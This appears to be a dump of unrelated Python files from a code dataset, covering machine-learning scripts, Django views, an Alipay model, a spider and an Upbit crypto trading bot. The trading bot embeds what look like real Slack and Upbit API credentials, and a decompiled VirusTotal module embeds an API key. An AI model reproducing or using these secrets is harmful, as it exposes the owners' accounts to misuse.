+{"seq_id":"401683634","text":"import pandas as pd\nimport numpy as np\nimport preprocessing as pre\nfrom sklearn.svm import LinearSVC\nimport time\nimport evaluatemodel as evm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import GridSearchCV\n\nparam = {'C': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],\n 'class_weight': [None, 'balanced'],\n 'fit_intercept': [False, True],\n 'intercept_scaling': [0, 0.5, 1],\n 'loss': ['hinge', 'squared_hinge'],\n 'max_iter': [10000,11500, 12000, 13500, 15000],\n 'multi_class': ['ovr', 'crammer_singer'],\n 'penalty': ['l1','l2'],\n 'tol': [0.0001, 0.0005, 0.001, 0.005],\n 'verbose': [1, 2, 4, 5, 10, 20]\n }\n\n##Funções de GridSearchCV\ndef config_param(clf, param, cv = 5, n_jobs = 1, scoring = 'balanced_accuracy'):\n grid_class = GridSearchCV(clf, param, cv = cv, n_jobs = n_jobs, scoring = scoring)\n return clf, grid_class\n\ndef get_param(clf, param, X, y):\n clf, grid_class = config_param(clf, param)\n return grid_class.fit(X,y)\n\ndef best_model(clf, X, Y):\n all_param = get_param(clf, param, X, Y)\n best_result = all_param.best_estimator_\n return best_result\n\n## Aplicação das funções de gridsearch para os melhores parâmetros da máquina de vetor suporte\ndef SVMClass():\n print(\"-------------------\")\n print(\"Support Vector Machine\")\n print(\"Início do CVGrid\")\n inicio = time.time()\n clf = LinearSVC()\n XaTrain, XaTest, yaTrain, yaTest = pre.Data()\n svm_class = best_model(clf, XaTrain, yaTrain)\n clf = svm_class.fit(XaTrain, yaTrain)\n yPred = clf.predict(XaTest)\n final = time.time() - inicio\n min = final/60\n print(\"Melhores parâmetros: \")\n print(svm_class)\n print('Tempo de Execução: {} min '.format(min))\n print('Final do CVGrid')\n print(\"-------------------\")\n return XaTrain, XaTest, yaTrain, yaTest, yPred, clf\n\ndef SVMMetrics():\n print(\"-------------------\")\n print(\"Métricas Support Vector Machine\")\n XaTrain, XaTest, yaTrain, yaTest, yPred, clf = SVMClass()\n inicio = time.time()\n evm.CrossValidation(clf, XaTest, yPred)\n final = time.time() - inicio\n min = final/60\n print('Tempo de Execução: {} min '.format(min))\n print('Final das Métricas')\n print(\"-------------------\")\n\ndef PlotSVM():\n XaTrain, XaTest, yaTrain, yaTest, yPred, clf = SVMClass()\n XaTest = pd.DataFrame(XaTest)\n yPred = pd.DataFrame(yPred)\n df = pd.concat([XaTest, yaTest], axis = 1)\n df.insert(27, 'Predições', yPred.values, allow_duplicates = False)\n sns.relplot(data=df, x=\"Banda 1\", y='Nuvem Alta', hue = 'Predições')\n plt.show()\n","sub_path":"GridTotalCloud/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"484846531","text":"# coding=utf-8\nimport json\nfrom django.http.response import HttpResponse\nfrom django.db.models import CharField, Value as V\nfrom django.db.models.functions import Concat\nfrom rest_framework.views import APIView\nfrom bims.models.biological_collection_record import BiologicalCollectionRecord\nfrom sass.models import SiteVisit\n\n\nclass CollectorList(APIView):\n \"\"\"API for listing all biological collection record collectors.\"\"\"\n\n def get(self, request, *args):\n assessors = (\n SiteVisit.objects.all().exclude(\n assessor__isnull=True\n ).annotate(\n full_name=Concat(\n 'assessor__first_name', V(' '), 'assessor__last_name',\n output_field=CharField()\n )\n ).distinct('full_name').order_by(\n 'full_name'\n ).values_list('full_name', flat=True)\n )\n collectors = (\n BiologicalCollectionRecord.objects.filter(\n validated=True).exclude(\n collector__exact='').values_list(\n 'collector', flat=True).distinct(\n 'collector'\n ).order_by('collector')\n )\n all_users = list(assessors) + list(collectors)\n all_users = list(set(all_users))\n all_users.sort()\n user_index = 0\n if len(all_users) > 0:\n while all_users[user_index] == ' ':\n user_index += 1\n return HttpResponse(\n json.dumps(all_users[user_index:]),\n content_type='application/json'\n )\n","sub_path":"bims/api_views/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"200571780","text":"import pyupbit\nimport random\nimport time\nimport requests\n\ndef post_message(token, channel, text):\n response = requests.post(\"https://slack.com/api/chat.postMessage\",\n headers={\"Authorization\": \"Bearer \" + token},\n data={\"channel\": channel, \"text\": text})\n #print(response)\n\nmyToken = \"xoxb-2214036150211-2213836848130-MGOLLe5LfbVZP5h8buojkHCY\"\npost_message(myToken, \"#stock\", \"코인 자동매매 시작\")\n\n#def dbgout(message):\n# \"\"\"인자로 받은 문자열을 파이썬 셸과 슬랙으로 동시에 출력한다.\"\"\"\n# print(datetime.now().strftime('[%m/%d %H:%M:%S]'), message)\n# strbuf = datetime.now().strftime('[%m/%d %H:%M:%S] ') + message\n# post_message(myToken,\"#stock\", strbuf)\n\naccess = \"W0pBEN1VwvBvTHtp8zD2hVfgxufsv0PHzrgwCbaS\"\nsecret = \"z0iST1K4uhFwP1QKX8riwXmIPxwRsPu4xnUr9KKw\"\n\ntickers = pyupbit.get_tickers(fiat=\"KRW\") #업비트에 있는 원화코인만 검색\nrandom.shuffle(tickers) ## ticker 랜덤으로 Scan 하도록 명령.\n\n#post_message(myToken, \"#stock\", \"종목:\" + str(tickers) + \"매수 완료\")\n#post_message(myToken, \"#stock\", \"종목:\" + str(tickers) + \"매도 완료\")\n\ndef get_target_price(ticker):\n \"\"\"종목 5분봉 현재 이전 종가 가격\"\"\"\n Y_lp_ma5 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n Y_lm5_price = Y_lp_ma5['close'].rolling(5).mean()\n Y_lm5_list = Y_lm5_price.iloc[-2]\n return Y_lm5_list\n\ndef get_current_price(ticker):\n \"\"\"종목 5분봉 현재 가격\"\"\"\n Now_lp_ma5 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n Now_lm5_price = Now_lp_ma5['close'].rolling(5).mean()\n Now_lm5_list = Now_lm5_price.iloc[-1]\n return Now_lm5_list\n\ndef sell_target_price(ticker):\n \"\"\"종목 5분봉 10일선 현재 가격\"\"\"\n Now_lp_ma10 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n Now_lm10_price = Now_lp_ma10['close'].rolling(10).mean()\n Now_lm10_list = Now_lm10_price.iloc[-1]\n return Now_lm10_list\n\ndef buy_crypto_currency(ticker):\n krw = upbit.get_balance(ticker=\"KRW\") # 잔고에 남아있는 돈 얻어옴\n buy_price = pyupbit.get_current_price(ticker) #종목 현재가(매수가)\n unit = krw / float(buy_price) #원화 잔고를 최우선 매도가로 나눠서 구매 가능한 수량을 계산\n unit2 = unit - unit * 0.05 #주문 수량에서 수수료(unit * 0.015) 뺀 가격\n upbit.buy_limit_order(ticker, buy_price, unit2) #종목, 매수가, 매수 수량\n #upbit.buy_market_order(ticker, krw)\n #print(\"%s %s개 매수\" % ticker, unit)\n\ndef sell_crypto_currency(ticker):\n unit = upbit.get_balance(ticker)\n upbit.sell_market_order(ticker, unit)\n\n# 로그인\nupbit = pyupbit.Upbit(access, secret)\nprint(\"자동매매 시작\")\n\nwhile True:\n for ticker in tickers:\n target_price = get_target_price(ticker) + get_target_price(ticker) * 0.02\n current_price = get_current_price(ticker)\n sell_price = sell_target_price(ticker)\n try:\n if target_price < current_price:\n buy_crypto_currency(ticker)\n print(\"종목 :\", ticker)\n print(\"매수 완료\")\n post_message(myToken, \"#stock\", \"종목:\" + str(ticker) + \"매수 완료\")\n else:\n if current_price < sell_price:\n sell_crypto_currency(ticker)\n print(\"종목 :\", ticker)\n print(\"매도 완료\")\n post_message(myToken, \"#stock\", \"종목:\" + str(ticker) + \"매도 완료\")\n except:\n time.sleep(0.5)\n time.sleep(1)\n print(\"-----------------------잠시 대기 중-----------------------\")\n #post_message(myToken, \"#stock\", \"잠시 대기 중\")\n","sub_path":"Upbit_auto.py","file_name":"Upbit_auto.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"418447651","text":"# -*-coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\n\nfrom libs.models.detectors.single_stage_base_network import DetectionNetworkBase\nfrom libs.models.losses.losses import Loss\nfrom libs.utils import bbox_transform, nms_rotate\nfrom libs.utils.coordinate_convert import coordinate_present_convert\nfrom libs.models.samplers.retinanet.anchor_sampler_retinenet import AnchorSamplerRetinaNet\n\n\nclass DetectionNetworkRetinaNet(DetectionNetworkBase):\n\n def __init__(self, cfgs, is_training):\n super(DetectionNetworkRetinaNet, self).__init__(cfgs, is_training)\n self.anchor_sampler_retinenet = AnchorSamplerRetinaNet(cfgs)\n self.losses = Loss(self.cfgs)\n\n def build_whole_detection_network(self, input_img_batch, gtboxes_batch_h=None, gtboxes_batch_r=None, gpu_id=0):\n\n if self.is_training:\n gtboxes_batch_h = tf.reshape(gtboxes_batch_h, [-1, 5])\n gtboxes_batch_h = tf.cast(gtboxes_batch_h, tf.float32)\n\n gtboxes_batch_r = tf.reshape(gtboxes_batch_r, [-1, 6])\n gtboxes_batch_r = tf.cast(gtboxes_batch_r, tf.float32)\n\n if self.cfgs.USE_GN:\n input_img_batch = tf.reshape(input_img_batch, [1, self.cfgs.IMG_SHORT_SIDE_LEN,\n self.cfgs.IMG_MAX_LENGTH, 3])\n\n # 1. build backbone\n feature_pyramid = self.build_backbone(input_img_batch)\n\n # 2. build rpn\n rpn_box_pred_list, rpn_cls_score_list, rpn_cls_prob_list = self.rpn_net(feature_pyramid, 'rpn_net')\n rpn_box_pred = tf.concat(rpn_box_pred_list, axis=0)\n rpn_cls_score = tf.concat(rpn_cls_score_list, axis=0)\n rpn_cls_prob = tf.concat(rpn_cls_prob_list, axis=0)\n\n # 3. generate anchors\n anchor_list = self.make_anchors(feature_pyramid)\n anchors = tf.concat(anchor_list, axis=0)\n\n # 4. build loss\n if self.is_training:\n with tf.variable_scope('build_loss'):\n labels, target_delta, anchor_states, target_boxes = tf.py_func(func=self.anchor_sampler_retinenet.anchor_target_layer,\n inp=[gtboxes_batch_h,\n gtboxes_batch_r, anchors, gpu_id],\n Tout=[tf.float32, tf.float32, tf.float32,\n tf.float32])\n\n if self.method == 'H':\n self.add_anchor_img_smry(input_img_batch, anchors, anchor_states, 0)\n else:\n self.add_anchor_img_smry(input_img_batch, anchors, anchor_states, 1)\n\n cls_loss = self.losses.focal_loss(labels, rpn_cls_score, anchor_states)\n\n if self.cfgs.REG_LOSS_MODE == 0:\n reg_loss = self.losses.iou_smooth_l1_loss_log(target_delta, rpn_box_pred, anchor_states,\n target_boxes, anchors)\n elif self.cfgs.REG_LOSS_MODE == 1:\n reg_loss = self.losses.iou_smooth_l1_loss_exp(target_delta, rpn_box_pred, anchor_states,\n target_boxes, anchors, alpha=self.cfgs.ALPHA,\n beta=self.cfgs.BETA)\n else:\n reg_loss = self.losses.smooth_l1_loss(target_delta, rpn_box_pred, anchor_states)\n\n self.losses_dict['cls_loss'] = cls_loss * self.cfgs.CLS_WEIGHT\n self.losses_dict['reg_loss'] = reg_loss * self.cfgs.REG_WEIGHT\n\n # 5. postprocess\n with tf.variable_scope('postprocess_detctions'):\n boxes, scores, category = self.postprocess_detctions(rpn_bbox_pred=rpn_box_pred,\n rpn_cls_prob=rpn_cls_prob,\n anchors=anchors)\n boxes = tf.stop_gradient(boxes)\n scores = tf.stop_gradient(scores)\n category = tf.stop_gradient(category)\n\n if self.is_training:\n return boxes, scores, category, self.losses_dict\n else:\n return boxes, scores, category\n\n def postprocess_detctions(self, rpn_bbox_pred, rpn_cls_prob, anchors):\n\n return_boxes_pred = []\n return_scores = []\n return_labels = []\n for j in range(0, self.cfgs.CLASS_NUM):\n scores = rpn_cls_prob[:, j]\n if self.is_training:\n indices = tf.reshape(tf.where(tf.greater(scores, self.cfgs.VIS_SCORE)), [-1, ])\n else:\n indices = tf.reshape(tf.where(tf.greater(scores, self.cfgs.FILTERED_SCORE)), [-1, ])\n\n anchors_ = tf.gather(anchors, indices)\n rpn_bbox_pred_ = tf.gather(rpn_bbox_pred, indices)\n scores = tf.gather(scores, indices)\n\n if self.method == 'H':\n x_c = (anchors_[:, 2] + anchors_[:, 0]) / 2\n y_c = (anchors_[:, 3] + anchors_[:, 1]) / 2\n h = anchors_[:, 2] - anchors_[:, 0] + 1\n w = anchors_[:, 3] - anchors_[:, 1] + 1\n theta = -90 * tf.ones_like(x_c)\n anchors_ = tf.transpose(tf.stack([x_c, y_c, w, h, theta]))\n\n if self.cfgs.ANGLE_RANGE == 180:\n anchors_ = tf.py_func(coordinate_present_convert,\n inp=[anchors_, -1],\n Tout=[tf.float32])\n anchors_ = tf.reshape(anchors_, [-1, 5])\n\n boxes_pred = bbox_transform.rbbox_transform_inv(boxes=anchors_, deltas=rpn_bbox_pred_)\n\n if self.cfgs.ANGLE_RANGE == 180:\n _, _, _, _, theta = tf.unstack(boxes_pred, axis=1)\n indx = tf.reshape(tf.where(tf.logical_and(tf.less(theta, 0), tf.greater_equal(theta, -180))), [-1, ])\n boxes_pred = tf.gather(boxes_pred, indx)\n scores = tf.gather(scores, indx)\n\n boxes_pred = tf.py_func(coordinate_present_convert,\n inp=[boxes_pred, 1],\n Tout=[tf.float32])\n boxes_pred = tf.reshape(boxes_pred, [-1, 5])\n\n nms_indices = nms_rotate.nms_rotate(decode_boxes=boxes_pred,\n scores=scores,\n iou_threshold=self.cfgs.NMS_IOU_THRESHOLD,\n max_output_size=100 if self.is_training else 1000,\n use_gpu=False)\n\n tmp_boxes_pred = tf.reshape(tf.gather(boxes_pred, nms_indices), [-1, 5])\n tmp_scores = tf.reshape(tf.gather(scores, nms_indices), [-1, ])\n\n return_boxes_pred.append(tmp_boxes_pred)\n return_scores.append(tmp_scores)\n return_labels.append(tf.ones_like(tmp_scores) * (j + 1))\n\n return_boxes_pred = tf.concat(return_boxes_pred, axis=0)\n return_scores = tf.concat(return_scores, axis=0)\n return_labels = tf.concat(return_labels, axis=0)\n\n return return_boxes_pred, return_scores, return_labels\n","sub_path":"libs/models/detectors/retinenet/build_whole_network.py","file_name":"build_whole_network.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"334857653","text":"import time\nfrom typing import List, Tuple\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchtext.data as tt\nfrom sklearn.metrics import confusion_matrix\n\nfrom q3_model import RNNPOSTagger\nfrom tools import print_cm, load_ud_pos_data, EarlyStopping\n\n\ndef train(model: RNNPOSTagger, train_iter: tt.Iterator, val_iter: tt.Iterator,\n optimizer: optim.Optimizer, criterion: nn.Module, epochs: int,\n short_train: bool = False, patience: int = 3):\n \"\"\"\n Trains a model.\n\n :param model: The model to train\n :param train_iter: The training iterator\n :param val_iter: The validation iterator\n :param optimizer: The optimizer\n :param criterion: The loss function\n :param epochs: The number of epochs to train for\n :param short_train: If True, only train every 20 batches\n :param patience: The max # of loss-increasing epochs before early stopping \n :return: None\n \"\"\"\n early_stopping = EarlyStopping(patience=patience, verbose=False, filename='q3_checkpoint.pt')\n for epoch in range(epochs):\n start_time = time.time()\n epoch_loss = 0.\n total_batches = 0\n for batch_idx, batch in enumerate(train_iter):\n if short_train and batch_idx % 20 != 0:\n continue\n\n # Forward pass\n optimizer.zero_grad()\n output, _ = model.forward(batch.text)\n batch_loss = 0.\n for i in range(output.size()[0]):\n batch_loss += criterion(output[i, :, :].squeeze(),\n batch.udtags[i, :].squeeze())\n\n # Backward pass\n batch_loss.backward(retain_graph=True)\n optimizer.step()\n\n # Record the total loss\n epoch_loss += batch_loss\n total_batches += 1\n\n # Finish training, print status to stdout\n duration = (time.time() - start_time)\n accuracy, unk_accuracy, val_loss = evaluate(model, val_iter, criterion)\n print(\"Epoch %d\" % epoch, end=\": \")\n print(\"loss per batch = %.4f\" % (epoch_loss / total_batches), end=\", \")\n print(\"val loss = %.4f\" % val_loss, end=\", \")\n print(\"val acc = %.4f\" % accuracy, end=\", \")\n print(\"unk acc = %.4f\" % unk_accuracy, end=\" \")\n print(\"(%.3f sec)\" % duration)\n early_stopping(val_loss, model)\n if early_stopping.early_stop:\n print(\"Early stopping, reloading checkpoint model\")\n model.load_state_dict(torch.load('q3_checkpoint.pt'))\n break\n\ndef eval_sent(model: RNNPOSTagger, sentence_list: List[str]) -> \\\n List[List[str]]:\n \"\"\"\n Runs the model on a list of sentences.\n\n :param model: The model to run\n :param sentence_list: A list of input sentences that the model will\n tag. Each sentence is a string of words separated by spaces. See\n the script at the bottom for an example\n :return: The POS tags of each sentence in sentence_list\n \"\"\"\n predictions = []\n sentences = [model.text_field.tokenize(s) for s in sentence_list]\n indices = model.text_field.process(sentences)\n model_output = model.forward(indices)[0].argmax(2)\n for i in range(len(sentences)):\n predictions.append([model.tag_field.vocab.itos[j]\n for j in model_output[1:-1, i]])\n\n return predictions\n\n\ndef evaluate(model: RNNPOSTagger, eval_iter: tt.Iterator, criterion: nn.Module,\n conf_matrix: bool = False) -> Tuple[float, float]:\n \"\"\"\n Evaluates a model.\n\n :param model: The model to evaluate\n :param eval_iter: The testing or validation iterator\n :param conf_matrix: If true, a confusion matrix will be printed to\n stdout\n :return: The model's accuracy on the provided dataset\n \"\"\"\n pad_token = model.tag_field.pad_token\n bos_token = model.tag_field.init_token\n eos_token = model.tag_field.eos_token\n unk_token = model.text_field.unk_token\n\n pad_index = model.tag_field.vocab.stoi[pad_token]\n bos_index = model.tag_field.vocab.stoi[bos_token]\n eos_index = model.tag_field.vocab.stoi[eos_token]\n unk_index = model.text_field.vocab.stoi[unk_token]\n\n pads, correct, tries, unks, unk_correct, loss = 0., 0., 0., 0., 0., 0.\n pred_list, target_list = np.array([]), np.array([])\n for i, batch in enumerate(eval_iter):\n sentence_length, batch_size = batch.text.size()\n\n # Mask out , , and \n pad_mask = (batch.udtags == pad_index)\n bos_mask = (batch.udtags == bos_index)\n eos_mask = (batch.udtags == eos_index)\n other_mask = pad_mask | bos_mask | eos_mask\n others = torch.sum(other_mask)\n\n # Count the number of \n unk_mask = (batch.text == unk_index)\n unks += torch.sum(unk_mask)\n\n # Count the total number of words evaluated\n tries += (sentence_length * batch_size) - others\n\n # Compute model output\n \n y_hat, _ = model.forward(batch.text)\n model_output = y_hat.argmax(2)\n\n #compute batch loss \n for i in range(sentence_length):\n loss += criterion(y_hat[i,:,:].squeeze(), batch.udtags[i,:].squeeze())\n\n target_list = np.concatenate((target_list,\n batch.udtags.view(-1).numpy()))\n pred_list = np.concatenate((pred_list, model_output.view(-1).numpy()))\n\n # Count correct predictions\n correct_mask = (batch.udtags == model_output) & ~other_mask\n correct += torch.sum(correct_mask)\n unk_correct += torch.sum(unk_mask & correct_mask)\n\n # Compute accuracy\n accuracy = correct / tries\n unk_accuracy = unk_correct / unks\n\n # Display a confusion matrix\n if conf_matrix:\n target_list = [model.tag_field.vocab.itos[int(target)]\n for target in target_list]\n pred_list = [model.tag_field.vocab.itos[int(pred)]\n for pred in pred_list]\n cm = confusion_matrix(target_list, pred_list,\n labels=model.tag_field.vocab.itos)\n print_cm(cm, model.tag_field.vocab.itos)\n\n return accuracy.item(), unk_accuracy.item(), (loss.item() / i)\n\n\nif __name__ == \"__main__\":\n # Problem 3d: Use this script to test your code.\n # My results for the hyperparameter tuning are in a separate text file.\n train_iter, val_iter, test_iter, text_field, tag_field = \\\n load_ud_pos_data(10, min_freq=2)\n\n # Set up the model\n tagger = RNNPOSTagger(text_field, tag_field, 20, 10, bidir=False)\n pad_token = tag_field.pad_token\n pad_index = tag_field.vocab.stoi[pad_token]\n criterion = nn.CrossEntropyLoss(ignore_index=pad_index)\n optimizer = optim.Adam(tagger.parameters(), lr=1e-3)\n\n # Train the model\n train(tagger, train_iter, val_iter, optimizer, criterion, 40,\n short_train=True)\n\n # Test the model\n sent = [\"if you push it , it will never work .\"]\n print(sent[0], \"POS tags:\", ' '.join(eval_sent(tagger, sent)[0]))\n print(\"test set acc = %.4f, test set unk acc = %.4f, test set loss = %.4f\" %\n evaluate(tagger, test_iter, criterion))\n","sub_path":"RNN Part of Speech Tagger/q3_classifier.py","file_name":"q3_classifier.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"405515886","text":"# -*- coding: utf-8 -*-\nimport csv\nfrom DefAttri import Rule, printRules, printSortRules\n\nif __name__ == \"__main__\":\n Rules = set()\n ResultRules = set()\n MergeFlag = False\n #读取文件\n print(\"Loading syslog, pleasing waiting ...\\n\")\n with open('yixiao-tcp.csv', 'r', encoding='UTF-8') as csvfile:\n reader = csv.reader(csvfile, dialect='excel', delimiter=\",\")\n for i, rows in enumerate(reader):\n src1 = rows[0].encode('utf-8').decode('utf-8-sig') # 去掉\\ufeff\n dest1 = rows[1].encode('utf-8').decode('utf-8-sig')\n port1 = rows[2].encode('utf-8').decode('utf-8-sig')\n count = int(rows[3].encode('utf-8').decode('utf-8-sig'))\n temprule = Rule(src1, dest1, port1, count)\n Rules.add(temprule)\n print('加载第 %d 条日志,请等待...'%i)\n # Rules.add(Rule(src1,dest1,port1))\n # temprule = Rule(rows[0],rows[1],rows[2])\n\n #RULES 自合并\n i = len(Rules) #以rule的里面的规则数为计数\n while len(Rules) != 0:\n temprule = Rules.pop() #先找一条出来\n i -= 1 #计数器要相应的减1\n print(\"Raw Rules are %d Results are %d\\n\"%(len(Rules), len(ResultRules)))\n for rule in Rules: #开始循环\n if temprule.MergeRule(rule): #开始合并\n Rules.discard(rule) #合并成功,则删掉此规则\n MergeFlag = True #合并成功标志\n i = i-1 #rule的数量减少1条,合并的规则送回去继续合并\n break #跳出当前循环,进行set规则清理\n if not MergeFlag: #如果没有合并成功,说明这条规则是单独的, 送回最终的规则库里\n ResultRules.add(temprule)\n else:\n Rules.add(temprule) #有合并成功的,则继续需要合并\n i += 1 # 加回去的,计数器要加1\n MergeFlag = False #再次的合并成功的标志\n\n # print('整理IP中,大约需要15分钟,请等待...')\n # j = 1\n # for i in ResultRules:\n # print('整理第 %d 条,请等待'%j)\n # i.ConvertIP()\n # j += 1\n\n\n # #规则输出到文件 规则输出到文件 规则输出到文件 规则输出到文件\n # print(\"结果输出到文件中,请等待...\")\n # ruletxt = open('Rules.txt', 'w')\n # rawtxt = open('rawRules.txt', 'w')\n # printRules(ruletxt, rawtxt, ResultRules)\n # ruletxt.close()\n # rawtxt.close()\n\n\n\n # 按照rulePort 类型,即服务类型输出到文件\n print(\"结果输出到文件中,请等待...\")\n rawtxt = open('sortRules.txt', 'w')\n printSortRules(rawtxt, ResultRules)\n rawtxt.close()\n print(\"执行完成,结束。\")\n","sub_path":"MakeRule.py","file_name":"MakeRule.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"81571909","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/nex/projects/snoopdroid/snoopdroid/virustotal.py\n# Compiled at: 2020-04-03 08:08:14\n# Size of source mod 2**32: 3192 bytes\nimport time, requests\nfrom halo import Halo\nfrom terminaltables import AsciiTable\nfrom .ui import info, highlight, red\n\ndef get_virustotal_report(hashes):\n apikey = '233f22e200ca5822bd91103043ccac138b910db79f29af5616a9afe8b6f215ad'\n url = 'https://www.virustotal.com/partners/sysinternals/file-reports?apikey={}'.format(apikey)\n items = []\n for sha256 in hashes:\n items.append({'hash':sha256, \n 'image_path':'unknown', \n 'creation_datetime':'unknown'})\n else:\n headers = {'User-Agent':'VirusTotal', \n 'Content-Type':'application/json'}\n res = requests.post(url, headers=headers, json=items)\n if res.status_code == 200:\n report = res.json()\n return report['data']\n\n\ndef virustotal_lookup(packages):\n print(info('Looking up all extracted files on ' + highlight('VirusTotal') + ' (www.virustotal.com).'))\n print('')\n detections = {}\n\n def virustotal_query(batch):\n report = get_virustotal_report(batch)\n if report:\n for entry in report:\n if entry['hash'] not in detections and entry['found'] == True:\n detections[entry['hash']] = entry['detection_ratio']\n\n with Halo(text='', spinner='bouncingBar') as (spinner):\n batch = []\n for package in packages:\n for file in package.files:\n batch.append(file['sha256'])\n if len(batch) == 25:\n spinner.text = 'Looking up first 25 apps...'\n virustotal_query(batch)\n batch = []\n\n else:\n if batch:\n spinner.text = 'Looking up remaining files...'\n virustotal_query(batch)\n spinner.succeed('Completed!')\n\n table_data = []\n table_data.append(['Package name', 'File path', 'Detections'])\n for package in packages:\n for file in package.files:\n row = [\n package.name, file['stored_path']]\n if file['sha256'] in detections:\n detection = detections[file['sha256']]\n positives = detection.split('/')[0]\n if int(positives) > 0:\n row.append(red(detection))\n else:\n row.append(detection)\n else:\n row.append('not found')\n table_data.append(row)\n else:\n print('')\n table = AsciiTable(table_data)\n print(table.table)","sub_path":"pycfiles/snoopdroid-2.3-py3-none-any/virustotal.cpython-38.py","file_name":"virustotal.cpython-38.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"593819307","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass MybankPaymentTradeBusinessOperateQueryModel(object):\n\n def __init__(self):\n self._order_no = None\n self._request_no = None\n\n @property\n def order_no(self):\n return self._order_no\n\n @order_no.setter\n def order_no(self, value):\n self._order_no = value\n @property\n def request_no(self):\n return self._request_no\n\n @request_no.setter\n def request_no(self, value):\n self._request_no = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.order_no:\n if hasattr(self.order_no, 'to_alipay_dict'):\n params['order_no'] = self.order_no.to_alipay_dict()\n else:\n params['order_no'] = self.order_no\n if self.request_no:\n if hasattr(self.request_no, 'to_alipay_dict'):\n params['request_no'] = self.request_no.to_alipay_dict()\n else:\n params['request_no'] = self.request_no\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = MybankPaymentTradeBusinessOperateQueryModel()\n if 'order_no' in d:\n o.order_no = d['order_no']\n if 'request_no' in d:\n o.request_no = d['request_no']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/MybankPaymentTradeBusinessOperateQueryModel.py","file_name":"MybankPaymentTradeBusinessOperateQueryModel.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"624547462","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom order.data_scraper import Scraper\n\nclass Command(BaseCommand):\n\n help = 'Populates or updates database with new products'\n\n def handle(self, *args, **kwargs):\n headers = settings.HEADERS\n url = settings.SCRAPE_URL\n dataframe = Scraper(url, headers)\n dataframe.run()\n","sub_path":"dropship_django/product/management/commands/run_scraper.py","file_name":"run_scraper.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"220751873","text":"#!/usr/bin/env python3\n#\n# File: spider3.py\n# Author: Matt Weidner \n# Descr: Simple web spider that spiders arbitrary site up to\n# X levels deep, customizable by the user.\n# (POC web spider)\n\n\nimport httplib2\nfrom lxml import etree\nimport pprint\nimport re\nimport sys\n\ndebug = False\nlinks = []\nmax_depth = 9999\ndot_count = 0\n\ndef dbg_print(string):\n if debug != False:\n print(' [D]: ' + string)\n\ndef fix_url(base_url, link):\n # Resolves a relative URL to an absolute URL.\n if re.search('^\\w+:', link):\n return link\n elif link[0] == '/':\n return (base_url + link[1:])\n else:\n return (base_url + link)\n\ndef fix_urls(base_url, links):\n new_urls = []\n for url in links:\n if url == '':\n continue\n new_urls.append(fix_url(base_url, url))\n return new_urls\n\ndef get_page_links(http, link):\n new_urls = []\n # HTTP GET a URL and return a list of links parsed from anchor tags.\n r_header,r_body = http.request(link, 'GET')\n #dbg_print('raw type: ' + r_header['content-type'])\n if re.search('text/html',r_header['content-type']):\n if len(r_header['content-type']) < 19:\n str_content_type = 'us-ascii'\n else:\n str_content_type = r_header['content-type'][19:]\n dbg_print('parsed type: ' + str_content_type)\n html = etree.HTML(r_body.decode(str_content_type))\n if (html.xpath('//a/@href')):\n new_urls = html.xpath('//a/@href')\n return new_urls\n\ndef spider(http, base_url, link, mapped_links, unmapped_links, depth):\n global dot_count\n dbg_print('D(' + str(depth) + ') L: ' + link)\n if depth == 0:\n return\n absolute_link = fix_url(base_url, link)\n dbg_print('[spdr] ' + absolute_link)\n page_links = get_page_links(http, absolute_link)\n if not (absolute_link in mapped_links):\n mapped_links.append(absolute_link)\n print(absolute_link)\n if not sys.stdout.isatty():\n print('.',end='',file=sys.stderr)\n dot_count = dot_count + 1\n sys.stderr.flush()\n if dot_count == 40:\n print('',file=sys.stderr)\n dot_count = 0\n if debug:\n pprint.pprint(page_links)\n if not page_links == None:\n unmapped_links = unmapped_links + page_links\n else:\n return\n #pprint.pprint(unmapped_links)\n unmapped_links = fix_urls(base_url, unmapped_links)\n #pprint.pprint(unmapped_links)\n if len(unmapped_links) > 0:\n for link2 in unmapped_links:\n if link2 == '':\n continue\n if not (link2 in mapped_links):\n if re.search('^' + base_url, link2):\n spider(http, base_url, link2, mapped_links, unmapped_links, depth-1)\n\ndef main():\n print(\" _______ _____ _____ ______ _______ ______ _____ __ __\", file=sys.stderr)\n print(\" |______ |_____] | | \\ |______ |_____/ |_____] 